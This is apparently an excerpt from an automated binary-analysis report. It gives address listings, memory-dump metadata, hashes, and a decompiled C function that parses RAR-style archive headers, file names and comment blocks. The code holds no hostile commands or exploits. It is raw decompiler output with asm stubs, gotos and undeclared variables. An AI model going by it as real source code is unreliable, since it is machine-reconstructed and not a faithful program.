    0x0085d828
    0x0085d828
    0x0085d838
    0x0085d83f
    0x0085d842
    0x0085d843
    0x0085d845
    0x0085d845
    0x0085d849
    0x0085d84f
    0x0085d851
    0x0085d853
    0x0085d859
    0x0085d85c
    0x0085d86d
    0x0085d870
    0x0085d876
    0x0085d88b
    0x0085d890
    0x0085d85e
    0x0085d85e
    0x0085d865
    0x0085d865
    0x0085d85c
    0x0085d8a1
    0x0085d8b0
    0x0085d8b1
    0x0085d8b1
    0x0085d8b3
    0x0085d8b5
    0x0085d8b5
    0x0085d8bb
    0x0085d8be
    0x0085d8c0
    0x0085d8c2
    0x0085d8c2
    0x0085d8c5
    0x0085d8c6
    0x0085d8c6
    0x0085d8cb
    0x0085d8ce
    0x0085d8d2
    0x0085d8d2
    0x0085d8d3
    0x0085d8d5
    0x0085d8db
    0x0085d8e1
    0x00000000
    0x00000000
    0x00000000
    0x0085d8e1
    0x0085d814
    0x0085d8e7
    0x0085d8e7
    0x00000000
    0x0085d8e7
    0x0085c66c
    0x0085c663
    0x0085c65a
    0x0085c611
    0x0085c615
    0x0085c61d
    0x00000000
    0x0085c61f
    0x0085c625
    0x0085c62a
    0x0085d906
    0x0085d906
    0x0085d909
    0x0085d914
    0x0085d93f
    0x0085d940
    0x0085d941
    0x0085d942
    0x0085d943
    0x0085d944
    0x0085d949
    0x0085d951
    0x0085d956
    0x0085d95c
    0x0085d961
    0x0085d962
    0x0085d962
    0x0085d962
    0x0085d968
    0x0085d969
    0x0085d969
    0x0085d96c
    0x0085d972
    0x00000000
    0x00000000
    0x0085d974
    0x0085d979
    0x0085d97c
    0x0085d97e
    0x0085d986
    0x0085d988
    0x0085d98a
    0x0085d98f
    0x0085d992
    0x0085d998
    0x0085d99b
    0x0085d99d
    0x0085d99d
    0x0085d99d
    0x0085d99d
    0x0085d99b
    0x0085d9a0
    0x0085d9ac
    0x0085d9b2
    0x0085d9ba
    0x0085d9bf
    0x0085d9c0
    0x0085d9c5
    0x0085d9c5
    0x0085d9c5
    0x0085d9c5
    0x0085d9c9
    0x0085d9c9
    0x0085d9cc
    0x0085d9d3
    0x0085d9e0
    0x0085d916
    0x0085d916
    0x0085d916
    0x0085d920
    0x0085d929
    0x0085d92e
    0x0085d93c
    0x0085d93c
    0x0085d914
    0x0085c61d

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __floor_pentium4
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
    • API String ID: 4168288129-2761157908
    • Opcode ID: 38bb045769cf6f9446f9e871ecce89477f040347f9d19ccd890b5484dd571aa1
    • Instruction ID: eb54d72e4e0d02fa4ee2b837ae84a8da34bf0610f9f4ceb16879bd551104e21c
    • Opcode Fuzzy Hash: 38bb045769cf6f9446f9e871ecce89477f040347f9d19ccd890b5484dd571aa1
    • Instruction Fuzzy Hash: CDC21872E046288FDB35CE289D407EAB7B5FB48346F1541EAD84DE7240E774AE898F41
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0083277D(intOrPtr* __ecx, void* __eflags) {
    				void* __ebp;
    				unsigned int _t341;
    				signed int _t345;
    				char _t364;
    				signed short _t371;
    				signed int _t376;
    				signed int _t384;
    				signed char _t386;
    				char _t406;
    				signed int _t407;
    				signed int _t411;
    				signed char _t425;
    				intOrPtr _t426;
    				char _t427;
    				signed int _t430;
    				signed int _t431;
    				signed char _t436;
    				signed int _t439;
    				signed int _t443;
    				signed short _t448;
    				signed short _t453;
    				unsigned int _t458;
    				signed int _t461;
    				void* _t464;
    				signed int _t466;
    				signed int _t469;
    				void* _t476;
    				signed int _t482;
    				unsigned int _t486;
    				void* _t487;
    				void* _t494;
    				void* _t495;
    				signed char _t501;
    				signed int _t515;
    				intOrPtr* _t528;
    				signed int _t531;
    				signed int _t532;
    				signed int _t541;
    				signed int _t546;
    				signed int _t548;
    				unsigned int _t557;
    				signed int _t559;
    				signed int _t572;
    				signed char _t574;
    				signed int _t575;
    				void* _t598;
    				signed int _t602;
    				signed int _t614;
    				signed int _t616;
    				signed int _t618;
    				unsigned int _t624;
    				signed char _t638;
    				signed char _t648;
    				signed int _t651;
    				unsigned int _t652;
    				signed int _t655;
    				signed int _t656;
    				signed int _t658;
    				signed int _t659;
    				unsigned int _t661;
    				signed int _t665;
    				void* _t666;
    				void* _t673;
    				signed int _t676;
    				signed int _t677;
    				signed char _t678;
    				signed int _t681;
    				void* _t683;
    				signed int _t689;
    				signed int _t690;
    				void* _t695;
    				signed int _t696;
    				signed int _t697;
    				signed int _t704;
    				signed int _t705;
    				intOrPtr _t707;
    				void* _t708;
    				intOrPtr _t717;
    
    				E0084D8C4(E0086121B, __ecx);
    				E0084D9C0();
    				_t528 = __ecx;
    				 *((intOrPtr*)(_t708 + 0x20)) = __ecx;
    				E0083C2C0(_t708 + 0x24, __ecx);
    				 *((intOrPtr*)(_t708 + 0x1c)) = 0;
    				 *((intOrPtr*)(_t708 - 4)) = 0;
    				_t665 = 7;
    				if( *((intOrPtr*)(__ecx + 0x6cbc)) == 0) {
    					L6:
    					 *((char*)(_t708 + 0x5e)) = 0;
    					L7:
    					E0083C4CB(_t648, _t665);
    					_t720 =  *((intOrPtr*)(_t708 + 0x3c));
    					if( *((intOrPtr*)(_t708 + 0x3c)) != 0) {
    						 *(_t528 + 0x21e4) = E0083C306(_t708 + 0x24) & 0x0000ffff;
    						 *(_t528 + 0x21f4) = 0;
    						_t689 = E0083C2EE(_t708 + 0x24) & 0x000000ff;
    						_t341 = E0083C306(_t708 + 0x24) & 0x0000ffff;
    						 *(_t528 + 0x21ec) = _t341;
    						 *(_t528 + 0x21f4) = _t341 >> 0x0000000e & 0x00000001;
    						_t541 = E0083C306(_t708 + 0x24) & 0x0000ffff;
    						 *(_t528 + 0x21f0) = _t541;
    						 *(_t528 + 0x21e8) = _t689;
    						__eflags = _t541 - _t665;
    						if(_t541 >= _t665) {
    							_t690 = _t689 - 0x73;
    							__eflags = _t690;
    							if(_t690 == 0) {
    								 *(_t528 + 0x21e8) = 1;
    							} else {
    								_t704 = _t690 - 1;
    								__eflags = _t704;
    								if(_t704 == 0) {
    									 *(_t528 + 0x21e8) = 2;
    								} else {
    									_t705 = _t704 - 6;
    									__eflags = _t705;
    									if(_t705 == 0) {
    										 *(_t528 + 0x21e8) = 3;
    									} else {
    										__eflags = _t705 == 1;
    										if(_t705 == 1) {
    											 *(_t528 + 0x21e8) = 5;
    										}
    									}
    								}
    							}
    							_t345 =  *(_t528 + 0x21e8);
    							 *(_t528 + 0x21dc) = _t345;
    							__eflags = _t345 - 0x75;
    							if(_t345 != 0x75) {
    								__eflags = _t345 - 1;
    								if(_t345 != 1) {
    									L23:
    									_push(_t541 - 7);
    									L24:
    									E0083C4CB(_t648);
    									 *((intOrPtr*)(_t528 + 0x6ca8)) =  *((intOrPtr*)(_t528 + 0x6ca0)) + E008318D9(_t528,  *(_t528 + 0x21f0));
    									_t546 =  *(_t528 + 0x21e8);
    									asm("adc eax, 0x0");
    									 *(_t528 + 0x6cac) =  *(_t528 + 0x6ca4);
    									 *(_t708 + 0x50) = _t546;
    									__eflags = _t546 - 1;
    									if(__eflags == 0) {
    										_t666 = _t528 + 0x2208;
    										E0083AA10(_t666);
    										_t548 = 5;
    										memcpy(_t666, _t528 + 0x21e4, _t548 << 2);
    										 *(_t528 + 0x221c) = E0083C306(_t708 + 0x24);
    										_t648 = E0083C33B(_t708 + 0x24);
    										 *(_t528 + 0x2220) = _t648;
    										 *(_t528 + 0x6cb5) =  *(_t528 + 0x2210) & 0x00000001;
    										 *(_t528 + 0x6cb4) =  *(_t528 + 0x2210) >> 0x00000003 & 0x00000001;
    										_t557 =  *(_t528 + 0x2210);
    										 *(_t528 + 0x6cb7) = _t557 >> 0x00000002 & 0x00000001;
    										 *(_t528 + 0x6cbb) = _t557 >> 0x00000006 & 0x00000001;
    										 *(_t528 + 0x6cbc) = _t557 >> 0x00000007 & 0x00000001;
    										__eflags = _t648;
    										if(_t648 != 0) {
    											L119:
    											_t364 = 1;
    											__eflags = 1;
    											L120:
    											 *((char*)(_t528 + 0x6cb8)) = _t364;
    											 *(_t528 + 0x2224) = _t557 >> 0x00000001 & 0x00000001;
    											_t559 = _t557 >> 0x00000004 & 0x00000001;
    											__eflags = _t559;
    											 *(_t528 + 0x6cb9) = _t557 >> 0x00000008 & 0x00000001;
    											 *(_t528 + 0x6cba) = _t559;
    											L121:
    											_t665 = 7;
    											L122:
    											_t371 = E0083C3EC(_t708 + 0x24, 0);
    											__eflags =  *(_t528 + 0x21e4) - (_t371 & 0x0000ffff);
    											if( *(_t528 + 0x21e4) == (_t371 & 0x0000ffff)) {
    												L132:
    												 *((intOrPtr*)(_t708 + 0x1c)) =  *((intOrPtr*)(_t708 + 0x3c));
    												goto L133;
    											}
    											_t376 =  *(_t528 + 0x21e8);
    											__eflags = _t376 - 0x79;
    											if(_t376 == 0x79) {
    												goto L132;
    											}
    											__eflags = _t376 - 0x76;
    											if(_t376 == 0x76) {
    												goto L132;
    											}
    											__eflags = _t376 - 5;
    											if(_t376 != 5) {
    												L130:
    												 *((char*)(_t528 + 0x6cc4)) = 1;
    												E00836F18(0x8700e0, 3);
    												__eflags =  *((char*)(_t708 + 0x5e));
    												if(__eflags == 0) {
    													goto L132;
    												}
    												E00831F29(__eflags, 4, _t528 + 0x1e, _t528 + 0x1e);
    												 *((char*)(_t528 + 0x6cc5)) = 1;
    												goto L133;
    											}
    											__eflags =  *(_t528 + 0x45ae);
    											if( *(_t528 + 0x45ae) == 0) {
    												goto L130;
    											}
    											 *((intOrPtr*)(_t708 + 4)) = _t528;
    											 *((intOrPtr*)(_t708 + 0xc)) =  *((intOrPtr*)( *_t528 + 0x14))();
    											 *(_t708 + 0x10) = _t648;
    											 *((char*)(_t708 - 4)) = 1;
    											_t384 =  *((intOrPtr*)( *_t528 + 0x14))() - _t665;
    											__eflags = _t384;
    											asm("sbb edx, ecx");
    											 *((intOrPtr*)( *_t528 + 0x10))(_t384, _t648, 0);
    											 *(_t708 + 0x5f) = 1;
    											do {
    												_t386 = E008397CF(_t528);
    												asm("sbb al, al");
    												 *(_t708 + 0x5f) =  *(_t708 + 0x5f) &  !( ~_t386);
    												_t665 = _t665 - 1;
    												__eflags = _t665;
    											} while (_t665 != 0);
    											 *((char*)(_t708 - 4)) = 0;
    											E0083168F(_t708 + 4);
    											__eflags =  *(_t708 + 0x5f);
    											if( *(_t708 + 0x5f) != 0) {
    												goto L132;
    											}
    											goto L130;
    										}
    										_t364 = 0;
    										__eflags =  *(_t528 + 0x221c);
    										if( *(_t528 + 0x221c) == 0) {
    											goto L120;
    										}
    										goto L119;
    									}
    									if(__eflags <= 0) {
    										L115:
    										__eflags =  *(_t528 + 0x21ec) & 0x00008000;
    										if(( *(_t528 + 0x21ec) & 0x00008000) != 0) {
    											 *((intOrPtr*)(_t528 + 0x6ca8)) =  *((intOrPtr*)(_t528 + 0x6ca8)) + E0083C33B(_t708 + 0x24);
    											asm("adc dword [ebx+0x6cac], 0x0");
    										}
    										goto L122;
    									}
    									__eflags = _t546 - 3;
    									if(_t546 <= 3) {
    										__eflags = _t546 - 2;
    										_t64 = (0 | _t546 != 0x00000002) - 1; // -1
    										_t673 = (_t64 & 0xffffdcb0) + 0x45d0 + _t528;
    										 *(_t708 + 0x48) = _t673;
    										E0083A976(_t673, 0);
    										_t572 = 5;
    										memcpy(_t673, _t528 + 0x21e4, _t572 << 2);
    										_t695 =  *(_t708 + 0x48);
    										_t676 =  *(_t708 + 0x50);
    										_t574 =  *(_t695 + 8);
    										 *(_t695 + 0x1098) =  *(_t695 + 8) & 1;
    										 *(_t695 + 0x1099) = _t574 >> 0x00000001 & 1;
    										 *(_t695 + 0x109b) = _t574 >> 0x00000002 & 1;
    										 *(_t695 + 0x10a0) = _t574 >> 0x0000000a & 1;
    										__eflags = _t676 - 2;
    										if(_t676 != 2) {
    											L35:
    											_t651 = 0;
    											__eflags = 0;
    											_t406 = 0;
    											L36:
    											 *((char*)(_t695 + 0x10f0)) = _t406;
    											__eflags = _t676 - 2;
    											if(_t676 == 2) {
    												L39:
    												_t407 = _t651;
    												L40:
    												 *(_t695 + 0x10fa) = _t407;
    												_t575 = _t574 & 0x000000e0;
    												__eflags = _t575 - 0xe0;
    												 *((char*)(_t695 + 0x10f1)) = 0 | _t575 == 0x000000e0;
    												__eflags = _t575 - 0xe0;
    												if(_t575 != 0xe0) {
    													_t652 =  *(_t695 + 8);
    													_t411 = 0x10000 << (_t652 >> 0x00000005 & 0x00000007);
    													__eflags = 0x10000;
    												} else {
    													_t411 = _t651;
    													_t652 =  *(_t695 + 8);
    												}
    												 *(_t695 + 0x10f4) = _t411;
    												 *(_t695 + 0x10f3) = _t652 >> 0x0000000b & 0x00000001;
    												 *(_t695 + 0x10f2) = _t652 >> 0x00000003 & 0x00000001;
    												 *((intOrPtr*)(_t695 + 0x14)) = E0083C33B(_t708 + 0x24);
    												 *(_t708 + 0x54) = E0083C33B(_t708 + 0x24);
    												 *((char*)(_t695 + 0x18)) = E0083C2EE(_t708 + 0x24);
    												 *(_t695 + 0x1070) = 2;
    												 *((intOrPtr*)(_t695 + 0x1074)) = E0083C33B(_t708 + 0x24);
    												 *(_t708 + 0x18) = E0083C33B(_t708 + 0x24);
    												 *(_t695 + 0x1c) = E0083C2EE(_t708 + 0x24) & 0x000000ff;
    												 *((char*)(_t695 + 0x20)) = E0083C2EE(_t708 + 0x24) - 0x30;
    												 *(_t708 + 0x4c) = E0083C306(_t708 + 0x24) & 0x0000ffff;
    												_t425 = E0083C33B(_t708 + 0x24);
    												_t655 =  *(_t695 + 0x1c);
    												 *(_t708 + 0x58) = _t425;
    												 *(_t695 + 0x24) = _t425;
    												__eflags = _t655 - 0x14;
    												if(_t655 < 0x14) {
    													__eflags = _t425 & 0x00000010;
    													if((_t425 & 0x00000010) != 0) {
    														 *((char*)(_t695 + 0x10f1)) = 1;
    													}
    												}
    												 *(_t695 + 0x109c) = 0;
    												__eflags =  *(_t695 + 0x109b);
    												if( *(_t695 + 0x109b) == 0) {
    													L55:
    													_t426 =  *((intOrPtr*)(_t695 + 0x18));
    													 *(_t695 + 0x10fc) = 2;
    													__eflags = _t426 - 3;
    													if(_t426 == 3) {
    														L59:
    														 *(_t695 + 0x10fc) = 1;
    														L60:
    														 *(_t695 + 0x1100) = 0;
    														__eflags = _t426 - 3;
    														if(_t426 == 3) {
    															__eflags = ( *(_t708 + 0x58) & 0x0000f000) - 0xa000;
    															if(( *(_t708 + 0x58) & 0x0000f000) == 0xa000) {
    																__eflags = 0;
    																 *(_t695 + 0x1100) = 1;
    																 *((short*)(_t695 + 0x1104)) = 0;
    															}
    														}
    														__eflags = _t676 - 2;
    														if(_t676 == 2) {
    															L66:
    															_t427 = 0;
    															goto L67;
    														} else {
    															__eflags =  *(_t695 + 0x24);
    															if( *(_t695 + 0x24) >= 0) {
    																goto L66;
    															}
    															_t427 = 1;
    															L67:
    															 *((char*)(_t695 + 0x10f8)) = _t427;
    															_t430 =  *(_t695 + 8) >> 0x00000008 & 0x00000001;
    															__eflags = _t430;
    															 *(_t695 + 0x10f9) = _t430;
    															if(_t430 == 0) {
    																__eflags =  *(_t708 + 0x54) - 0xffffffff;
    																_t648 = 0;
    																_t677 = 0;
    																_t137 =  *(_t708 + 0x54) == 0xffffffff;
    																__eflags = _t137;
    																_t431 = _t430 & 0xffffff00 | _t137;
    																L73:
    																 *(_t695 + 0x109a) = _t431;
    																 *((intOrPtr*)(_t695 + 0x1058)) = 0 +  *((intOrPtr*)(_t695 + 0x14));
    																asm("adc edi, ecx");
    																 *((intOrPtr*)(_t695 + 0x105c)) = _t677;
    																asm("adc edx, ecx");
    																 *(_t695 + 0x1060) = 0 +  *(_t708 + 0x54);
    																__eflags =  *(_t695 + 0x109a);
    																 *(_t695 + 0x1064) = _t648;
    																if( *(_t695 + 0x109a) != 0) {
    																	 *(_t695 + 0x1060) = 0x7fffffff;
    																	 *(_t695 + 0x1064) = 0x7fffffff;
    																}
    																_t436 =  *(_t708 + 0x4c);
    																_t678 = 0x1fff;
    																 *(_t708 + 0x54) = 0x1fff;
    																__eflags = _t436 - 0x1fff;
    																if(_t436 < 0x1fff) {
    																	_t678 = _t436;
    																	 *(_t708 + 0x54) = _t436;
    																}
    																E0083C39D(_t708 + 0x24, _t708 - 0x2030, _t678);
    																_t439 = 0;
    																__eflags =  *(_t708 + 0x50) - 2;
    																 *((char*)(_t708 + _t678 - 0x2030)) = 0;
    																if( *(_t708 + 0x50) != 2) {
    																	 *(_t708 + 0x50) = _t695 + 0x28;
    																	_t442 = E00841006(_t708 - 0x2030, _t695 + 0x28, 0x800);
    																	_t681 =  *((intOrPtr*)(_t695 + 0xc)) -  *(_t708 + 0x4c) - 0x20;
    																	__eflags =  *(_t695 + 8) & 0x00000400;
    																	if(( *(_t695 + 8) & 0x00000400) != 0) {
    																		_t681 = _t681 - 8;
    																		__eflags = _t681;
    																	}
    																	__eflags = _t681;
    																	if(_t681 <= 0) {
    																		_t682 = _t695 + 0x28;
    																	} else {
    																		 *(_t708 + 0x58) = _t695 + 0x1028;
    																		E00831FC9(_t695 + 0x1028, _t681);
    																		_t476 = E0083C39D(_t708 + 0x24,  *(_t695 + 0x1028), _t681);
    																		_t682 = _t695 + 0x28;
    																		_t442 = E00852BC9(_t476, _t695 + 0x28, L"RR");
    																		__eflags = _t442;
    																		if(_t442 == 0) {
    																			__eflags =  *((intOrPtr*)(_t695 + 0x102c)) - 0x14;
    																			if( *((intOrPtr*)(_t695 + 0x102c)) >= 0x14) {
    																				_t683 =  *( *(_t708 + 0x58));
    																				asm("cdq");
    																				_t614 =  *(_t683 + 0xb) & 0x000000ff;
    																				asm("cdq");
    																				_t616 = (_t614 << 8) + ( *(_t683 + 0xa) & 0x000000ff);
    																				asm("adc esi, edx");
    																				asm("cdq");
    																				_t618 = (_t616 << 8) + ( *(_t683 + 9) & 0x000000ff);
    																				asm("adc esi, edx");
    																				asm("cdq");
    																				_t482 = (_t618 << 8) + ( *(_t683 + 8) & 0x000000ff);
    																				asm("adc esi, edx");
    																				 *(_t528 + 0x21c0) = _t482 << 9;
    																				 *(_t528 + 0x21c4) = ((((_t648 << 0x00000020 | _t614) << 0x8 << 0x00000020 | _t616) << 0x8 << 0x00000020 | _t618) << 0x8 << 0x00000020 | _t482) << 9;
    																				_t486 = E0083F77F( *(_t528 + 0x21c0),  *(_t528 + 0x21c4),  *((intOrPtr*)( *_t528 + 0x14))(), _t648);
    																				 *(_t528 + 0x21c8) = _t486;
    																				 *(_t708 + 0x58) = _t486;
    																				_t487 = E0084D910(_t485, _t648, 0xc8, 0);
    																				asm("adc edx, [ebx+0x21c4]");
    																				_t442 = E0083F77F(_t487 +  *(_t528 + 0x21c0), _t648, _t485, _t648);
    																				_t624 =  *(_t708 + 0x58);
    																				_t695 =  *(_t708 + 0x48);
    																				_t682 =  *(_t708 + 0x50);
    																				__eflags = _t442 - _t624;
    																				if(_t442 > _t624) {
    																					_t442 = _t624 + 1;
    																					 *(_t528 + 0x21c8) = _t624 + 1;
    																				}
    																			}
    																		}
    																	}
    																	_t443 = E00852BC9(_t442, _t682, L"CMT");
    																	__eflags = _t443;
    																	if(_t443 == 0) {
    																		 *((char*)(_t528 + 0x6cb6)) = 1;
    																	}
    																} else {
    																	_t625 = 0;
    																	_t682 = _t695 + 0x28;
    																	 *_t682 = 0;
    																	__eflags =  *(_t695 + 8) & 0x00000200;
    																	if(( *(_t695 + 8) & 0x00000200) != 0) {
    																		E00836B0D(_t708);
    																		_t494 = E00852C10(_t708 - 0x2030);
    																		_t648 =  *(_t708 + 0x54);
    																		_t495 = _t494 + 1;
    																		_pop(_t625);
    																		__eflags = _t648 - _t495;
    																		if(_t648 > _t495) {
    																			__eflags = _t495 + _t708 - 0x2030;
    																			_t625 = _t708;
    																			E00836B1E(_t708, _t708 - 0x2030, _t648, _t495 + _t708 - 0x2030, _t648 - _t495, _t682, 0x800);
    																		}
    																		_t439 = 0;
    																		__eflags = 0;
    																	}
    																	__eflags =  *_t682 - _t439;
    																	if( *_t682 == _t439) {
    																		_push(1);
    																		_push(0x800);
    																		_push(_t682);
    																		_push(_t708 - 0x2030);
    																		E0083F7D5(_t625);
    																	}
    																	E00832028(_t528, _t695);
    																}
    																__eflags =  *(_t695 + 8) & 0x00000400;
    																if(( *(_t695 + 8) & 0x00000400) != 0) {
    																	E0083C39D(_t708 + 0x24, _t695 + 0x10a1, 8);
    																}
    																E008408DA( *(_t708 + 0x18));
    																__eflags =  *(_t695 + 8) & 0x00001000;
    																if(( *(_t695 + 8) & 0x00001000) == 0) {
    																	L112:
    																	 *((intOrPtr*)(_t528 + 0x6ca8)) = E00833DB9( *((intOrPtr*)(_t528 + 0x6ca8)),  *(_t528 + 0x6cac),  *((intOrPtr*)(_t695 + 0x1058)),  *((intOrPtr*)(_t695 + 0x105c)), 0, 0);
    																	 *(_t528 + 0x6cac) = _t648;
    																	 *((char*)(_t708 + 0x20)) =  *(_t695 + 0x10f2);
    																	_t448 = E0083C3EC(_t708 + 0x24,  *((intOrPtr*)(_t708 + 0x20)));
    																	__eflags =  *_t695 - (_t448 & 0x0000ffff);
    																	if( *_t695 != (_t448 & 0x0000ffff)) {
    																		 *((char*)(_t528 + 0x6cc4)) = 1;
    																		E00836F18(0x8700e0, 1);
    																		__eflags =  *((char*)(_t708 + 0x5e));
    																		if(__eflags == 0) {
    																			E00831F29(__eflags, 0x1c, _t528 + 0x1e, _t682);
    																		}
    																	}
    																	goto L121;
    																} else {
    																	_t453 = E0083C306(_t708 + 0x24);
    																	 *((intOrPtr*)(_t708 + 4)) = _t528 + 0x32c0;
    																	 *((intOrPtr*)(_t708 + 8)) = _t528 + 0x32c8;
    																	 *((intOrPtr*)(_t708 + 0xc)) = _t528 + 0x32d0;
    																	__eflags = 0;
    																	_t696 = 0;
    																	 *(_t708 + 0x10) = 0;
    																	_t458 = _t453 & 0x0000ffff;
    																	 *(_t708 + 0x4c) = 0;
    																	 *(_t708 + 0x58) = _t458;
    																	do {
    																		_t598 = 3;
    																		_t531 = _t458 >> _t598 - _t696 << 2;
    																		__eflags = _t531 & 0x00000008;
    																		if((_t531 & 0x00000008) == 0) {
    																			goto L110;
    																		}
    																		__eflags =  *(_t708 + 4 + _t696 * 4);
    																		if( *(_t708 + 4 + _t696 * 4) == 0) {
    																			goto L110;
    																		}
    																		__eflags = _t696;
    																		if(__eflags != 0) {
    																			E008408DA(E0083C33B(_t708 + 0x24));
    																		}
    																		E00840708( *(_t708 + 4 + _t696 * 4), _t648, __eflags, _t708 - 0x30);
    																		__eflags = _t531 & 0x00000004;
    																		if((_t531 & 0x00000004) != 0) {
    																			_t249 = _t708 - 0x1c;
    																			 *_t249 =  *(_t708 - 0x1c) + 1;
    																			__eflags =  *_t249;
    																		}
    																		_t602 = 0;
    																		 *(_t708 - 0x18) = 0;
    																		_t532 = _t531 & 0x00000003;
    																		__eflags = _t532;
    																		if(_t532 <= 0) {
    																			L109:
    																			_t461 = _t602 * 0x64;
    																			__eflags = _t461;
    																			 *(_t708 - 0x18) = _t461;
    																			E00840938( *(_t708 + 4 + _t696 * 4), _t648, _t708 - 0x30);
    																			_t458 =  *(_t708 + 0x58);
    																		} else {
    																			_t464 = 3;
    																			_t466 = _t464 - _t532 << 3;
    																			__eflags = _t466;
    																			 *(_t708 + 0x18) = _t466;
    																			_t697 = _t466;
    																			do {
    																				_t469 = (E0083C2EE(_t708 + 0x24) & 0x000000ff) << _t697;
    																				_t697 = _t697 + 8;
    																				_t602 =  *(_t708 - 0x18) | _t469;
    																				 *(_t708 - 0x18) = _t602;
    																				_t532 = _t532 - 1;
    																				__eflags = _t532;
    																			} while (_t532 != 0);
    																			_t696 =  *(_t708 + 0x4c);
    																			goto L109;
    																		}
    																		L110:
    																		_t696 = _t696 + 1;
    																		 *(_t708 + 0x4c) = _t696;
    																		__eflags = _t696 - 4;
    																	} while (_t696 < 4);
    																	_t528 =  *((intOrPtr*)(_t708 + 0x20));
    																	_t695 =  *(_t708 + 0x48);
    																	goto L112;
    																}
    															}
    															_t677 = E0083C33B(_t708 + 0x24);
    															_t501 = E0083C33B(_t708 + 0x24);
    															__eflags =  *(_t708 + 0x54) - 0xffffffff;
    															_t648 = _t501;
    															if( *(_t708 + 0x54) != 0xffffffff) {
    																L71:
    																_t431 = 0;
    																goto L73;
    															}
    															__eflags = _t648 - 0xffffffff;
    															if(_t648 != 0xffffffff) {
    																goto L71;
    															}
    															_t431 = 1;
    															goto L73;
    														}
    													}
    													__eflags = _t426 - 5;
    													if(_t426 == 5) {
    														goto L59;
    													}
    													__eflags = _t426 - 6;
    													if(_t426 < 6) {
    														 *(_t695 + 0x10fc) = 0;
    													}
    													goto L60;
    												} else {
    													_t656 = _t655 - 0xd;
    													__eflags = _t656;
    													if(_t656 == 0) {
    														 *(_t695 + 0x109c) = 1;
    														goto L55;
    													}
    													_t658 = _t656;
    													__eflags = _t658;
    													if(_t658 == 0) {
    														 *(_t695 + 0x109c) = 2;
    														goto L55;
    													}
    													_t659 = _t658 - 5;
    													__eflags = _t659;
    													if(_t659 == 0) {
    														L52:
    														 *(_t695 + 0x109c) = 3;
    														goto L55;
    													}
    													__eflags = _t659 == 6;
    													if(_t659 == 6) {
    														goto L52;
    													}
    													 *(_t695 + 0x109c) = 4;
    													goto L55;
    												}
    											}
    											__eflags = _t574 & 0x00000010;
    											if((_t574 & 0x00000010) == 0) {
    												goto L39;
    											}
    											_t407 = 1;
    											goto L40;
    										}
    										__eflags = _t574 & 0x00000010;
    										if((_t574 & 0x00000010) == 0) {
    											goto L35;
    										} else {
    											_t406 = 1;
    											_t651 = 0;
    											goto L36;
    										}
    									}
    									__eflags = _t546 - 5;
    									if(_t546 != 5) {
    										goto L115;
    									} else {
    										memcpy(_t528 + 0x4590, _t528 + 0x21e4, _t546 << 2);
    										_t661 =  *(_t528 + 0x4598);
    										 *(_t528 + 0x45ac) =  *(_t528 + 0x4598) & 0x00000001;
    										_t638 = _t661 >> 0x00000001 & 0x00000001;
    										_t648 = _t661 >> 0x00000003 & 0x00000001;
    										 *(_t528 + 0x45ad) = _t638;
    										 *(_t528 + 0x45ae) = _t661 >> 0x00000002 & 0x00000001;
    										 *(_t528 + 0x45af) = _t648;
    										__eflags = _t638;
    										if(_t638 != 0) {
    											 *((intOrPtr*)(_t528 + 0x45a4)) = E0083C33B(_t708 + 0x24);
    										}
    										__eflags =  *(_t528 + 0x45af);
    										if( *(_t528 + 0x45af) != 0) {
    											_t515 = E0083C306(_t708 + 0x24) & 0x0000ffff;
    											 *(_t528 + 0x45a8) = _t515;
    											 *(_t528 + 0x6cd8) = _t515;
    										}
    										goto L121;
    									}
    								}
    								__eflags =  *(_t528 + 0x21ec) & 0x00000002;
    								if(( *(_t528 + 0x21ec) & 0x00000002) != 0) {
    									goto L20;
    								}
    								goto L23;
    							}
    							L20:
    							_push(6);
    							goto L24;
    						} else {
    							E00831FE3(_t528);
    							L133:
    							E0083158D(_t708 + 0x24);
    							 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
    							return  *((intOrPtr*)(_t708 + 0x1c));
    						}
    					}
    					L8:
    					E00833EBD(_t528, _t648, _t720);
    					goto L133;
    				}
    				_t648 =  *((intOrPtr*)(__ecx + 0x6cc0)) + _t665;
    				asm("adc eax, ecx");
    				_t717 =  *((intOrPtr*)(__ecx + 0x6ca4));
    				if(_t717 < 0 || _t717 <= 0 &&  *((intOrPtr*)(__ecx + 0x6ca0)) <= _t648) {
    					goto L6;
    				} else {
    					 *((char*)(_t708 + 0x5e)) = 1;
    					E00833D52(_t528);
    					_push(8);
    					_push(_t708 + 0x14);
    					if( *((intOrPtr*)( *_t528 + 0xc))() != 8) {
    						goto L8;
    					} else {
    						_t707 = _t528 + 0x1024;
    						E008361AA(_t707, 0, 4,  *((intOrPtr*)(_t528 + 0x21bc)) + 0x5024, _t708 + 0x14, 0, 0, 0, 0);
    						 *((intOrPtr*)(_t708 + 0x44)) = _t707;
    						goto L7;
    					}
    				}
    			}

















































































    0x00832786
    0x00832790
    0x00832797
    0x0083279e
    0x008327a1
    0x008327aa
    0x008327ad
    0x008327b0
    0x008327b7
    0x0083281f
    0x0083281f
    0x00832822
    0x00832826
    0x0083282b
    0x0083282f
    0x0083284b
    0x00832851
    0x00832860
    0x00832868
    0x0083286e
    0x00832879
    0x00832884
    0x00832887
    0x0083288d
    0x00832893
    0x00832895
    0x008328a3
    0x008328a3
    0x008328a6
    0x008328db
    0x008328a8
    0x008328a8
    0x008328a8
    0x008328ab
    0x008328cf
    0x008328ad
    0x008328ad
    0x008328ad
    0x008328b0
    0x008328c3
    0x008328b2
    0x008328b2
    0x008328b5
    0x008328b7
    0x008328b7
    0x008328b5
    0x008328b0
    0x008328ab
    0x008328e5
    0x008328eb
    0x008328f1
    0x008328f4
    0x008328fa
    0x008328fd
    0x00832908
    0x0083290b
    0x0083290c
    0x0083290f
    0x0083292f
    0x00832935
    0x0083293b
    0x0083293e
    0x00832944
    0x00832947
